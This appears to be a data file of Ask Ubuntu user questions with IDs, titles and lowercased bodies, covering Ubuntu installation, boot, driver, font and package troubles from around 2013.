384411	kvm cpuand some video card problems	on boot i get these errors : this cpu is not supported by this model and kvm disabled by bios here is my system specs : amd fx 8120 m5a78l-m lx ati radeon hd6850 8gb ram ( used memtest no problem here ) weird thing is my motherboard supports my cpu and iget these errors when i write -vvnn | grep vga control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx+ bridgectl : parity+ serr+ noisa- vga+ mabort- > reset- fastb2b- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx+ bridgectl : parity+ serr+ noisa+ vga- mabort- > reset- fastb2b- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr+ fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr+ fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr+ fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr+ fastb2b- disintx- control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle+ memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- bridgectl : parity+ serr+ noisa+ vga- mabort- > reset- fastb2b- control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] barts pro [ radeon hd 6850 ] [ 1002:6739 ] ( prog-if 00 [ vga controller ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx+ control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx+ control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx+
384413	missing operating system ( ubuntu installation error )	i am a novice user of ubuntu . i had ubuntu 12.04 lts and windows 8 dual operating system side-by-side before in two separate hard drive ( one ssd and other hdd ) . but my windows crashed and i decided to install windows 8.1 .so when i installed windows 8.1 , the boot menu i used to choose operating system did not appear and it directly logged into windows 8.1 . then i tried to install ubuntu 12.04 lts again with usb stick with the procedure given here : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows but it did n't work . it gave me error `` missing operating system '' when i tried to boot my usb from uefi boot menu and then it directed to a boot menu where i could choose my old ubuntu ( but not my new windows 8.1 ) . to fix this error i decided to install a fresh copy of ubuntu and so i formatted that drive using windows . now , when i try to boot my usb drive , it gives me the same error `` missing operating system '' with some bonus errors `` unknows file system '' and the a command prompt with `` grum rescue > '' appear . i am really stuck with this problem . need help regards omar
384416	how to invert screen colors in unity without using ccsm	say i want to temporarily invert the colors on my screen for a better reading experience at night . however , i do n't want to install compizconfig settings manager and use its invert plugin . how can i do it ?
384417	where to find linux-source 3.12 package for saucy	the mainline kernel on ubuntu shows 3.12 available in saucy http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.12-saucy/ but where can i find the linux-source package for the same . http : //packages.ubuntu.com/search ? keywords=linux-source the linux source package above does not shows 3.12 choice for saucy thanks
384419	how can i upload mp3 's to youtube using ubuntu ?	i used to use windows moviemaker . i am new to ubuntu . is it possible to do this easily ? i am fairly techtarded .
384423	vga external monitor not detected in nvidia optimus	ubuntu does not detect the external monitor . i have bumblebee installed as indicated here . anyone know how to make this work ?
384424	how to add an adon manually to firefox	i am completely new to ubuntu and i have been trying to install a addon to firefox . name of addon : bytubed ( commonly known as `` bulk youtube downloader '' ) developers site : http : //msram.github.io/bytubed/ i could not add directly to fox because it is discontinued and wont show up in firefox addons , if you go to the developers page you can see there is two download for windows and linux .i downloaded it but how do i install it ... . thanks in advance
384425	increase in laptop temperature on dell 3521	the temperature of my laptop increases very much while i am using ubuntu . i think because of the graphic card . can anyone tell how to lower the temperature . laptop gets discharged in less than 1.5 hrs . result of : sensors coretemp-isa-0000 adapter : isa adapter physical id 0 : +79.0°c ( high= +87.0°c , crit = +105.0°c ) core 0 : +79.0°c ( high = +87.0°c , crit =+105.0°c ) core 1 : +81.0°c ( high = +87.0°c , crit =+105.0°c ) result of : lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 6601 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 08:00.0 network controller : atheros communications inc. device 0036 ( rev 01 )
384429	can not remove hiberfile on ntfs partition	i 've been looking at questions like unable to mount windows ( ntfs ) filesystem due to hibernation and how do i mount a hibernated ntfs partition ? and they all say `` boot into windows '' which i am unable to do . then after much cautioning , the option remove_hiberfile is suggested . i would love that option . i do n't care about the programs i had open , or the data in them . the windows partition is on /dev/sda5 , so i ran sudo mount /dev/sda5 /mnt/win lots of reading later ... sudo mount -t ntfs-3g -o remove_hiberfile /dev/sda5 /mnt/win sudo mount -t ntfs-3g -o debug , remove_hiberfile /dev/sda5 /mnt/win still no luck . it 's like the remove_hiberfile option is n't being recognized , because i do n't get an error when trying to use the option remove_hiberfile3ejeiofe but rather the same message . this is the message given as a result of all above commands ( adding debug did not change anything ) : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i am able to mount read-only , but that does n't help me much .
384434	mouse not working ( perrixx )	my perrixx mx3000 lights up but it does not move . is there anyway to make it work ? im stuck with my painfully broken mouse . i tried installing the drivers on the website but its only for windows . first command http : //pastebin.com/yvgdwd02 second and third command http : //pastebin.com/jjnbnzqe
384436	grub read error without usb connected [ 13.10 ]	after installing ubuntu 13.10 , i can only load grub if i have the liveusb i used connected . what happens is i get a black screen with `` read error '' . to circumvent this error , booting up with the usb connected , grub loads up completely fine and off i go . i do n't even have to manually boot up the usb . i have tried two solutions with no luck . sudo grub-install sda automatic boot-repair neither solves my problem . fresh boot-repair log few things to note : i 've just added a 3tb hard drive recently and reinstalled absolutely everything . however , the problem i am having has existed on my last installation , too . just saying this in case someone makes the relation and this information helps . ubuntu is on an ssd windows is installed on a my second hard drive , so grub is n't detecting it . i have n't solved this yet , if you guys notice that in the log . while i understand that this may appear to be a duplicate question , no solution they give has been successful . i hope that this changes the fact . edit : it 's quite late now . i 'll be heading to bed , so i 'll respond to any replies whenever i can .
384438	virtual host configuration	i have linux ubuntu server / apache http server and windows pc sitting side by side in order for me to practice development of websites . i have 8 virtual host sites configured on apache , each with its own domain name and file structure ( e.g. , css , images , video and the all important index.html to act as the main/home page as i understand . i use notepad++ to send files to the server . however when i enter http : //domainabc.com on the windows browser it opens the correct website file directory but never automatically opens the home page of the virtual website , but rather , again , it gives me only the directory list of files instead . and only when i click individually on these files do i see any content on my screen . i have tried everthing in the configuration of the virutal hosts but with no success . need help . thank you .
384439	how to configure a mounted drive to not show up under devices	i have ubuntu 13.10 installed on a system with three separate drives . the / and swap are on the first ( sda ) , /home is on the second ( sdb ) , and i have /home/username/backup on the third ( sdc ) . i had this set up before on crunchbang and they all three just showed as one device but for some reason on ubuntu i can only get sda and sdb to show as one device and sdc shows as a separate device . i edited etc/fstab and it mounts sda1 as / , sdb1 as /home and sdc1 as /home/username/backup . i dont understand why sdc shows up as a separate device that i can eject in ubuntu . anyone have any answers ?
384440	failure to download extra files related to fonts	i need these fonts . i am not just trying to get rid of that information available window . i can not download files like andale32.exe from http : //downloads.sourceforge.net/corefonts/andale32.exe . so i get those .exe files elsewhere , and put in a directory corefonts , then edit /etc/hosts to add 0.0.0.0 downloads.sourceforge.net serve those locally , and try to install ttf-mscorefonts-intaller : sudo python3 -m http.server 80 sudo apt-get purge ttf-mscorefonts-installer sudo apt-get install ttf-mscorefonts-installer every time those .exe are downloaded , and the installer reports no error . but i ca n't find those fonts in applications , and that window always appears : information available/update information the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . ttf-mscorefonts-installer the download will be attempted again later , or you can try the download again now . running this command requires an active internet connection .
384441	how to recreate mirror ubuntu system	i want to save the current list of installed packages and applications . how do i make it such that i save list of installed packages and settings and when i do clean install on some other machine i can just choose the file and my system matches to what i have now . basically i am looking for something ( similar to say puppet ) which can save my system and recreate when required . i want to save all things . thanks
384442	install ubuntu within windows 7.0	i 've carefully followed instructions for downloading ubuntu within windows 7.0. http : //www.ubuntu.com/download/ubuntu/windows-installer however , after the download , it gives me instructions for burning to disc . i already have a disc ( 12.04.03 ) but i want to boot from c : drive
384443	problems establishing serial connection with beagle bone black on ttyusb0	i have tried using minicom , putty , screen and ckermit to no avail . it looks as if the connection is intermittent from the output of dmesg | grep tty . [ 1627865.078080 ] usb 5-2 : product : am335x usb [ 1627865.078086 ] usb 5-2 : manufacturer : texas instruments [ 1627865.152124 ] rndis_host 5-2:1.0 : usb0 : register 'rndis_host ' at usb-0000:00:13.0-2 , rndis device , 9a:1f:85:1c:3d:0e [ 1627865.398299 ] userif-2 : sent link down event . [ 1627865.398309 ] userif-2 : sent link up event. < 6 > [ 1627905.546191 ] usb 5-2 : usb disconnect , device number 41 [ 1627905.547204 ] rndis_host 5-2:1.0 : usb0 : unregister 'rndis_host ' usb-0000:00:13.0-2 , rndis device [ 1627905.748089 ] userif-2 : sent link down event . [ 1627905.748098 ] userif-2 : sent link up event. < 6 > [ 1627910.599519 ] usb 5-2 : new full-speed usb device number 42 using ohci_hcd ** [ 1627910.758329 ] usb 5-2 : not running at top speed ; connect to a high speed hub [ 1627910.768319 ] usb 5-2 : new usb device found , idvendor=0451 , idproduct=6141 [ 1627910.768331 ] usb 5-2 : new usb device strings : mfr=33 , product=37 , serialnumber=0 [ 1627910.768340 ] usb 5-2 : product : am335x usb [ 1627910.768346 ] usb 5-2 : manufacturer : texas instruments [ 1627910.842502 ] rndis_host 5-2:1.0 : usb0 : register 'rndis_host ' at usb-0000:00:13.0-2 , rndis device , 9a:1f:85:1c:3d:0e [ 1627911.082551 ] userif-2 : sent link down event . [ 1627911.082555 ] userif-2 : sent link up event. < 6 > [ 1627921.042308 ] usb 5-2 : usb disconnect , device number 42 [ 1627921.043378 ] rndis_host 5-2:1.0 : usb0 : unregister 'rndis_host ' usb-0000:00:13.0-2 , rndis device** [ 1627921.243451 ] userif-2 : sent link down event . [ 1627921.243461 ] userif-2 : sent link up event. < 6 > [ 1627925.167815 ] usb 5-2 : new full-speed usb device number 43 using ohci_hcd [ 1627925.326657 ] usb 5-2 : not running at top speed ; connect to a high speed hub [ 1627925.336645 ] usb 5-2 : new usb device found , idvendor=0451 , idproduct=6141 [ 1627925.336658 ] usb 5-2 : new usb device strings : mfr=33 , product=37 , serialnumber=0 [ 1627925.336666 ] usb 5-2 : product : am335x usb [ 1627925.336673 ] usb 5-2 : manufacturer : texas instruments [ 1627925.411023 ] rndis_host 5-2:1.0 : usb0 : register 'rndis_host ' at usb-0000:00:13.0-2 , rndis device , 9a:1f:85:1c:3d:0e [ 1627925.665530 ] userif-2 : sent link down event . [ 1627925.665540 ] userif-2 : sent link up event. < 3 > [ 1627960.208500 ] hub 5-0:1.0 : unable to enumerate usb device on port 3 [ 1627960.448125 ] usb 2-3 : new high-speed usb device number 51 using ehci_hcd [ 1627960.581809 ] usb 2-3 : new usb device found , idvendor=14cd , idproduct=121f [ 1627960.581814 ] usb 2-3 : new usb device strings : mfr=1 , product=3 , serialnumber=2 [ 1627960.581816 ] usb 2-3 : product : mass storage device [ 1627960.581818 ] usb 2-3 : manufacturer : generic [ 1627960.581820 ] usb 2-3 : serialnumber : 121f20110712 [ 1627960.582540 ] scsi32 : usb-storage 2-3:1.0 [ 1627961.579368 ] scsi 32:0:0:0 : direct-access mass storage device 1.00 pq : 0 ansi : 0 ccs [ 1627961.580592 ] sd 32:0:0:0 : attached scsi generic sg3 type 0 [ 1627961.871287 ] sd 32:0:0:0 : [ sdc ] 15644672 512-byte logical blocks : ( 8.01 gb/7.45 gib ) [ 1627961.871786 ] sd 32:0:0:0 : [ sdc ] write protect is off [ 1627961.871799 ] sd 32:0:0:0 : [ sdc ] mode sense : 03 00 00 00 [ 1627961.872313 ] sd 32:0:0:0 : [ sdc ] no caching mode page found [ 1627961.872325 ] sd 32:0:0:0 : [ sdc ] assuming drive cache : write through [ 1627961.875901 ] sd 32:0:0:0 : [ sdc ] no caching mode page found [ 1627961.875913 ] sd 32:0:0:0 : [ sdc ] assuming drive cache : write through [ 1627961.876801 ] sdc : sdc1 sdc2 [ 1627961.883007 ] sd 32:0:0:0 : [ sdc ] no caching mode page found [ 1627961.883019 ] sd 32:0:0:0 : [ sdc ] assuming drive cache : write through [ 1627961.883028 ] sd 32:0:0:0 : [ sdc ] attached scsi removable disk [ 1627987.679657 ] usb 5-2 : usb disconnect , device number 43 [ 1627987.680127 ] rndis_host 5-2:1.0 : usb0 : unregister 'rndis_host ' usb-0000:00:13.0-2 , rndis device [ 1627987.880125 ] userif-2 : sent link down event . [ 1627987.880135 ] userif-2 : sent link up event. < 6 > [ 1636287.932125 ] usb 2-3 : usb disconnect , device number 51 [ 1636372.495480 ] usb 5-3 : new full-speed usb device number 45 using ohci_hcd [ 1636372.673303 ] usb 5-3 : new usb device found , idvendor=0403 , idproduct=6001 [ 1636372.673316 ] usb 5-3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 it looks like it is connected from this output but when i try to connect to /dev/ttyusb0 it does n't recognize ttyusb0 . i have tried changing the permissions also like it was suggested in another post to no avail . when i am trying to connect with putty at /dev/ttyusb0 with a speed of 115200 baud nothing happens visually when i click connect . i am also using moserial but i do not see usb0 in it 's drop down . any hints or direction on where to search is greatly appreciated ?
384449	some websites display incorrectly ( multiple browsers )	i have noticed recently that a few websites display incorrectly : www.dropbox.com and www.mediafire.com . they appear to only be loading a very minimal version of there websites ( see attachments ) . all other websites appear to load and function as expected . this issue happens with both firefox and chromium . i also have the same issue with both internet explorer and firefox when run in in virtual box with windows xp as guest . these websites display as expected on my other pc which has windows as the os . this leads me to believe it is more than an internet browser issue , but i have tried the standard troubleshooting steps anyways : clearing cache , cookies , ect ... i thought it could be an user agent issue , but it seems fine to me . any ideas ? os version : ubuntu 13.10.2 64 bit user agent : mozilla/5.0 ( x11 ; ubuntu ; linux x86_64 ; rv:25.0 ) gecko/20100101 firefox/25.0 firefox 25.0.1 chromium 30.0.1599.114 no proxy , no software firewall installed , have disabled all browser add-ons http : //dropbox.com on firefox : http : //mediafire.com on chromium :
384450	when installing ubuntu through virtual box i get an error	when installing ubuntu through virtual box i get an error this kernel requres an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu how do i fix this ?
384452	graphical packages not installed by mistake , lubuntu	so i installed lubuntu on my new laptop , but when it came to choosing what packages to install , i accidentally did n't install anything including the desktop . can anyone help me get a gui and where i can install packages afterwards . ( i only have command prompt if that was n't clear )
384453	need help in setting up wireless rtl8188/8192cu ( matrixx lw-m05 usb adapter ) ( on ubuntu 12.04 lts	quick situation and h/w outline : m/b asrock h61m-itx , particioned hardrive dual-boot via grub , ubuntu 12.04 lts or win7 , wireless adapter make : matrixx lw-m05 ? ? ( thats what is written on the package yet cant locate manufacturer ) , apparently uses realtek rtl8188/rtl8192cu chip ( cant confirm without actually breaking it apart : -i ) have propriaty linux software cd supplied with package , tried install , still wont find ap let alone connect ) .also have oldish smc ez connect smcwusbs-n2 usb dongle , chip ralink rt2770f ( aparently uses rt2870driver ! ? ? ! ) , this also wont connect.all hardware is brand new . to note : i do not have access to the ap physically therefor have no way to connect via ethernet ( rj45 hardwired connection ) ... have strictly wireless ( works perfectly on win7 ) .reached this ask ubuntu with machine booted in win7 ( can not update/or use ubuntu software centre etc ... no wireless=no can connect . am brand-new to linux in general , first-time user . ( obviously having teething problems ) . plotted action : searched this ubuntu help ( ask ) , tried various recommendations as suggested , have not managed . will have to download anything using windows ( tar , zip , etc ) , reboot into linux , find files and take action . have the following : motherboard oem cd with drivers ( none linux , all for windows ) downloaded rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911.zip from realtek official , and zip7 for windows . need `` idiots-guide '' assistance from here onwards.any help will ofcourse be appreciated .
384454	what happens to my data post-installation ?	i want to download ubuntu in place of windows 8 . i am just curious as to what happens to my saved data upon installation of ubuntu . will my files be present after installation ?
384455	unetbootin commands for installing ubuntu 13.10	i have made a live usb using unetbootin trying to install ubuntu 13.10 when i boot it up , the usual unetbootin start up screen appears , but when i choose any of the options , the screen goes smaller and a terminal type thing appears i have also tried remaking the usb . how do i install the os ? what are the commands to do that ? thanks in advance
384456	grub menu timer is not there now	i have to press enter in the grub menu ! earlier the 10 second timer was there . but now , i have to press enter ( no timer is there ) . how to repair it ? my grub file : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' 0 '' grub_timeout= '' 5 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo boss` '' grub_cmdline_linux_default= '' splash gfxpayload=1024x768x16 quiet '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode= '' 640x480 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
384461	xboxdrv messes with mouse	i 'm using xboxdrv , as i downloaded a psp emulator called ppsspp ( website here ) to play some patapon 2 with my ps3 controller ... anyway , i was setting up xboxdrv , and it worked at one point . i was able to customize the controls on the emulator to match the controller . but for some reason , now everytime i turn on xboxdrv , the mouse wo n't move out of the top right corner of my screen . i ca n't even get to the emulator , since it 's in the top of the screen . i ca n't even move it with my touchpad . it 's just kind of stuck there . i found out it was because of the analog sticks . i made a custom config of it [ xboxdrv ] , so i could play it [ patapon 2 ] . i just disabled the analog sticks . buuut , there 's still a problem . i ca n't play littlebigplanet , in which i have to use the analog stick ( that nubby thingy on the psp ) . so , i 've been scouring the manpage . changing deadzones and axismaps , using the ps3 config , to no avail . anyone have any ideas ? specs : kubuntu 13.10 ( saucy ) using a ps3 controller ( cuz i can : p ) controlling over usb
384463	how do i deploy to other severs with juju	my question is how do i deploy services via juju-gui to other servers without using maas ? in a previous posting i tried this and failed no matter how much or little i changed the procedure . now i have seen some documentation on the null option and commands that say deploy to another another machine . the question is i have server a-d , how do i manage resources from a and deploy applications and charms to b , c , and d ?
384465	desktopnova not working	my desktop is running on ubuntu 13.10 ( 64 bit ) . i installed desktopnova and desktopnova-tray , but no matter how i set the configurations , it does't change the backgrounds on the desktop . how can this be sorted ?
384467	i get the same updates every time	i see that on my ubuntu 12.04lts machine , i get the same updates every time . the updates are for vlc player . it repeats at least once a day . is something stuck or does it do that . i have installed vlc to the latest version for linux via commands i found on ask ubuntu that i have on terminal . o , and i see no other updates , but these .
384468	virtual second screen ?	i want to use my android phone as a second screen . i plan to do this by setting up a virtual second screen on the laptop and then vnc-ing to that screen from the android . how would i go about setting up a virtual screen ?
384469	how to install ttf fonts ?	i want to install a font from true type of font of my own . where should i install my font in ubuntu ?
384472	how can transparency be enabled in cinnamon ?	i am running cinnamon 2.0.13 ( on ubuntu 12.04.3 lts ) . how can i add transparency in the window borders ?
384477	why ca n't i view my files on-line ?	i used to be able to access my files on-line in the cloud . now i have to download them and i ca n't seem to find a way to unsync my files . please advise ... .someone ?
384478	ubuntu cloud vs. server	i would like to understand the difference between the ubuntu cloud and server iso image . what are the differences ? are there different `` packages '' part of the images ? would be useful to know what is different . fgeld
384479	no extensions appearing for gnome-shell 3.11.2	i 've been upgraded to gnome-shell 3.11.2 for several weeks now but have been unable to install any extensions through the gnome extensions website . i usually wait several days for the extensions devs to update the extensions to the newest gnome shell , but i have been unable to even view any extensions for a few weeks now . when i go to the gnome extensions website i can not view any extensions unless i change the filter from `` extensions for your version '' to `` extensions for other versions '' . is this an issue with my gnome installation or are the extensions to being updated ? i am on 13.10 .
384480	can not open trash from nautilus	i accidentally deleted all my music files from rhythmbox . and i want to restore it from the trash . but when i open the trash in nautilus , i got error `` aborted ( core dumped ) '' in terminal . why is it ? i 've tried to use trash-cli , but it can only restore file one by one , and i 've about 1300 files to restore . any other idea to restore them ?
384483	how to reset compizcomfig settins from tty1	i installed compizconfig from ubuntu software-center onto 12.04 lts . i changed desktop , effect , general and so on settings . i am unable to open terminal after pressing ctrl + alt+ t. neither close icon is shown nor open any apps dirctely.. i face problem very much.. i do n't know how reset each and every settings before i set in.. when i type command amd enter unity -- reset in tty1 it gives warning : no display variable set , setting is to :0 unity-panel-service : no process found backend : ini integration : true profile : default adding plugins initializing core option ... done please help me .
384486	ca n't switch to a2dp	i 've just made a new clean installation of ubuntu 13.10 . i 've connected my bluetooth audio adapter without any problem . in fact , i could configure it without any trouble , switching it 's output to a2dp ( using gui ) . then i played some songs in clementine , with a perfect result . but after a reboot , i found that my adapter was no longer playing in a2dp . so i tried to set it right by , again , the sound configuration interface . the problem is that now it wo n't let me switch from duplex to a2dp , but the option is still available for me to choose . in fact , what happens is that when i change the mode to a2dp , no other option seems to be affected by it , the test sound option still only lets me try in `` mono '' . and when i switch tabs , or close the sound interface , it just comes back to `` duplex '' . i 've tried rebooting both the pc and the adapter , and re-pairing them . but none of theese seem to work . it 's also pretty weird that it let me configure it right the first time . any ideas ? thanks in advance .
384487	my question is about read , write and execute permissions of a file in linux:	i 've created a text file and i 've assigned read only permission to that file . now when i copy that file to ntfs partition then its read only permission is vanished and i'am able to modify that file . so , what happens to the permissions of file that i changed in ext4 partition of linux ? it is not secure at all .
384489	pc ( intel x86 ) server install cd	does pc ( intel x86 ) server install cd version supports 64-bit ? it 's little bit confusing - the amd version explicitly mentioned 64-bit support . fgeld
384491	file sharing between windows and ubuntu - home network	i have my personal laptop with ubuntu 13 installed . i have my windows office laptop ( domain name : domain.rest300.com ) ( note : no workgroup name ) . how can i share files between these two laptops . ? i tried samba , but since i can not change domain to workgroup , it didnt work . note : i am not supposed to change it . any help or thoughts , please share .. warm regards , anilal kg
384496	ca n't install ms true type fonts	the ttf-mscorefonts-installer is installed but no fonts in /usr/share/fonts/truetype/msttcorefonts . message in this folder reads : license refused . please reinstall the ttf-mscorefonts-installer package ( e.g . via apt-get install -- reinstall ttf-mscorefonts-installer to get prompted for the license again . re-installing the installer proceeds until license . unable to click ok at bottom . when attempting to install netflix-desktop i have the same problem . message reads `` it appears you have not installed ms true type fonts . you need to accept the license agreement and install these fonts for netflix desktop to work properly . '' i checked the accept box in the previous screen but still get this message .
384500	ubuntu touch - how to start an application ?	i installed firefox in my ubuntu touch by issuing the following command sudo apt-get install firefox now i do n't know how to start firefox . firefox icon is not shown either in the dash or in the launcher . i tried typing firefox inside terminal . i got error : no display specified
384503	ubuntu server ; grub loader install fail- this is fatal error	i am trying to install ubuntu server 12.04 64 bit on a server with *hp proliant*motherboard , but i face this error : grub loader install fail , this is a fatal error . i tried solving the matter with an ubuntu live cd as it comes in following link : how to repair/restore/reinstall grub with live cd but as i enter sudo mount /dev/sda5 /mnt the output is partition does not exist using gparted there is only one partition with 250 mb and it 's fat32 with vid label . which i am not able to delete . can you please help me through this .
384504	how to install mono 2.8 and 2.10 with winetricks ?	i am following this guide to use terraria with wine . i reached step 7 , which says install mono 2.10 and 2.8 via winetricks . people have reported there is no need to install xact and xinput . if you run into trouble after this point , install them and see if it fixes the problem you have . how do i do this ? i think i installed winetricks , but i do n't know how to use it .
384505	screen gamma level gets reset in ubuntu 13.10	i 'm using a monitor with default gamma level set too high . it has no way to adjust gamma via monitor controls so i use xgamma -gamma .75 to get a decent picture . the problem is that gamma level gets randomly reset back to 1 . this happens when i , for example , start a video with vlc for the first time during session . it also happens sometimes when viewing web-pages . seems to be pages with flash or other embedded video players . i tried to write a script that would check gamma level and set it to .75 if it 's not , but xgamma always returns .75 even though gamma level was reverted ( the difference is clearly visible ) , so i ca n't detect it programmatically . i 'll be grateful for ideas on solving this permanently .
384506	getting started with wubi	what are the advantages of using the wubi installer ? can it be used for dual booting windows xp 32-bit with ubuntu ? also is it possible to use wubi for installing ubuntu 32-bit version ? a step-by-step explanation would be helpful .
384508	how to share exfat external hard drive over smb ?	the permissions for the drive are all for the root user and i do not know how to change them . the drive is a 3tb toshiba canvio formatted as exfat . i can read and write but when i try to share it says i do not have the right permissions . btw i am running ubuntu 12.04 . thanks .
384509	`` user is not in the sudoers file '' , how to read the incident reports ?	many times i got warning/notice while accidentally tried to do some privileged action using my non-root account like below , gulu @ workpc : ~ $ sudo apt-get update [ sudo ] password for gulu : gulu is not in the sudoers file . this incident will be reported . but when i logged into my sudoers account i never received any report of such an incident . where are the reports reported ? how to access those ? or is it some trivial warning message for non-sudoers ?
384511	files list for package 'patch ' is not a regular file	linux av-projects 3.11.0-14-generic # 21-ubuntu smp tue nov 12 17:04:55 utc 2013 x86_64 x86_64 x86_64 gnu/linux ubuntu 14.10 i had a strange boot yesterday with some files little corrupt . i could repair most of it but i ca n't install and remove software with apt-get or dpkg . i get always this error : dpkg : unrecoverable fatal error , aborting : files list for package 'patch ' is not a regular file e : sub-process /usr/bin/dpkg returned an error code ( 2 ) it complains at the moment upgrading virtualbox but it applies to any install , upgrade or remove . can somebody help me ? i have read most of what is online to this error message but could so far not resolve this issue . i have done already the common things like apt-get update , upgrade , dpkg -- configure -a this is the full output . root @ xxxxxx : ~ # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : virtualbox-4.2 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/64.2 mb of archives . after this operation , 828 kb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... selecting previously unselected package virtualbox-4.2 . dpkg : unrecoverable fatal error , aborting : files list for package 'patch ' is not a regular file e : sub-process /usr/bin/dpkg returned an error code ( 2 )
